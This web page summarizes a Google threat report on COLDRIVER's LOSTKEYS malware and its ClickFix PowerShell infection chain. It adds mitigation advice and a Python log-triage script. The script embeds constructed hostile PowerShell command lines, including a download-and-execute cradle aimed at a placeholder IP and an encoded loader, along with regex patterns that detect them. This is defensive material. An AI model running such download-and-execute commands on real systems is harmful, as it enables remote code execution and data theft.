
Digital safety starts here for both commercial and personal Use...

Defend Your Business Against the Latest WNY Cyber Threats. We offer Safe, Secure and Affordable Solutions for your Business and Personal Networks and Devices.



WNYCyber is there to help you to choose the best service providers in Western New York... We DO NOT provide the services ourselves, as we are Internet Programmers who have to deal daily with Cyber Threats... (Ugghhh)... So we know what it's like and what it takes to protect OUR and OUR CUSTOMERS' DATA... We built this Website to help steer you to those that can give you the best service at realistic and non-inflated prices. We do not charge or collect any fees.

COLDRIVER Using New Malware To Steal Documents From Western Targets and NGOs

Summary:
Google’s Threat Intelligence Group (GTIG) has discovered a new malware strain named LOSTKEYS, linked to the Russian state-sponsored group COLDRIVER (also known as UNC4057, Star Blizzard, and Callisto). This malware is designed to exfiltrate files from targeted directories based on specific extensions, collect system information, and report running processes to the attacker. COLDRIVER is historically known for credential phishing campaigns targeting NGOs, NATO-affiliated individuals, journalists, and those connected to Ukraine, with the ultimate aim of intelligence collection supporting Russia’s strategic objectives. While the group’s primary tactic involves stealing credentials to access emails and contact lists, they have also deployed malware, including SPICA and now LOSTKEYS, for deeper system access in more sensitive operations.

The LOSTKEYS infection chain starts with a lure website displaying a fake CAPTCHA, which, upon interaction, tricks the user into copying and running a PowerShell command—an example of the broader “ClickFix” social engineering tactic. The PowerShell script then pulls down a second-stage script from a hardcoded IP, which uses a hash of the device's display resolution to avoid executing inside virtual machines. If that check passes, it proceeds to a third stage consisting of Base64-encoded PowerShell, which retrieves two additional files: a Visual Basic decoder script and an encoded payload. These use a custom substitution cipher, with unique keys for each infection chain, to decode the final malware.


The final payload, LOSTKEYS, is a VBS file capable of exfiltrating documents from specific directories and sending system metadata and a list of running processes back to the command and control server. While COLDRIVER’s earlier malware, SPICA, served a similar purpose, LOSTKEYS appears to be more advanced and is only deployed in carefully selected operations, likely against high-value targets with strategic intelligence relevance. This aligns with COLDRIVER’s documented history of combining credential theft with targeted malware deployment to enhance access and persistence.


Security Officer Comments:
During their investigation, GTIG uncovered two additional LOSTKEYS samples dated December 2023. These older variants were distributed as Portable Executable (PE) files, disguised as legitimate tools such as the open-source intelligence platform Maltego. Though it’s unclear if these samples were directly tied to COLDRIVER at the time, they may represent an earlier version of the tool later refined and integrated into the group's active operations.


Suggested Corrections:
To mitigate the risk from groups like COLDRIVER, Google urges users, especially those likely to be targeted by state-backed actors, to enroll in the Advanced Protection Program, enable Enhanced Safe Browsing in Chrome, and implement enterprise-level security controls that restrict end-user script execution and enforce least-privilege access. Organizations should also educate employees about social engineering tactics like ClickFix and closely monitor for unauthorized use of PowerShell, especially clipboard-based execution chains.
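As an added illustration (not part of the original advisory or Google's report), the Python sketch below shows the kind of process-creation log triage the monitoring advice above calls for: it decodes Base64 `-EncodedCommand` arguments and flags the traits the ClickFix chain in the Summary exhibits (hidden-window PowerShell, a download cradle pulling from a raw IP, Invoke-Expression, a `.vbs` decoder). The event records, IP address and paths are constructed samples, not real LOSTKEYS indicators.

```python
import base64
import re

# Regexes for traits of the ClickFix -> PowerShell -> downloader chain described above.
INDICATORS = {
    "hidden_window": re.compile(r"-w(?:indowstyle)?\s+hidden", re.I),
    "policy_bypass": re.compile(r"-e(?:xecutionpolicy|p)\s+bypass", re.I),
    "download_cradle": re.compile(
        r"DownloadString|DownloadFile|Invoke-WebRequest|\biwr\b|Invoke-RestMethod|\birm\b|Net\.WebClient", re.I),
    "invoke_expression": re.compile(r"\biex\b|Invoke-Expression", re.I),
    "raw_ip_url": re.compile(r"https?://\d{1,3}(?:\.\d{1,3}){3}", re.I),   # hardcoded-IP staging host
    "vbs_decoder": re.compile(r"[wc]script(?:\.exe)?\s+.*\.vbs|\.vbs\b", re.I),
}
# -EncodedCommand and its aliases (-e, -ec, -enc), followed by a Base64 token.
ENCODED_RE = re.compile(r"-e(?:nc|ncodedcommand|c)?\s+([A-Za-z0-9+/=]{16,})", re.I)

# Constructed sample stage: what an encoded third-stage loader might look like (placeholder IP).
_ENCODED_STAGE = base64.b64encode(
    "$s=(New-Object Net.WebClient).DownloadString('http://192.0.2.10/stage3');iex $s".encode("utf-16le")
).decode("ascii")

# Constructed process-creation events (parent image + command line); not real indicators.
SAMPLE_EVENTS = [
    {"parent": "explorer.exe",
     "cmdline": "powershell.exe -w hidden -ep bypass -c \"iex (New-Object Net.WebClient).DownloadString('http://192.0.2.10/stage2')\""},
    {"parent": "explorer.exe", "cmdline": "powershell.exe -nop -w hidden -enc " + _ENCODED_STAGE},
    {"parent": "cmd.exe", "cmdline": "powershell.exe -File C:\\scripts\\backup.ps1"},
]

def decode_encoded_command(cmdline):
    """Return the plaintext of a -EncodedCommand argument (UTF-16LE Base64), or None."""
    m = ENCODED_RE.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16le")
    except (ValueError, UnicodeDecodeError):
        return None

def analyze_event(event):
    """Score one event: returns (score, matched indicator names, decoded command or None)."""
    text = event["cmdline"]
    decoded = decode_encoded_command(text)
    if decoded:
        text = text + " " + decoded          # inspect the decoded payload, not just the wrapper
    hits = [name for name, rx in INDICATORS.items() if rx.search(text)]
    if decoded:
        hits.append("encoded_command")
    # ClickFix lures have the victim paste into the Run dialog, so explorer.exe is the usual parent.
    if hits and event["parent"].lower() == "explorer.exe":
        hits.append("run_dialog_parent")
    return len(hits), hits, decoded

def suspicious_events(events, threshold=3):
    """Return (cmdline, hits) for events whose indicator count reaches the threshold."""
    return [(e["cmdline"], analyze_event(e)[1]) for e in events if analyze_event(e)[0] >= threshold]
```

Feed real Sysmon event 1 or Windows 4688 command lines in place of `SAMPLE_EVENTS` and tune the threshold; the decoded text also reveals the staging URL to block at the proxy.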

Link(s):
https://cloud.google.com/blog/topic...oldriver-steal-documents-western-targets-ngos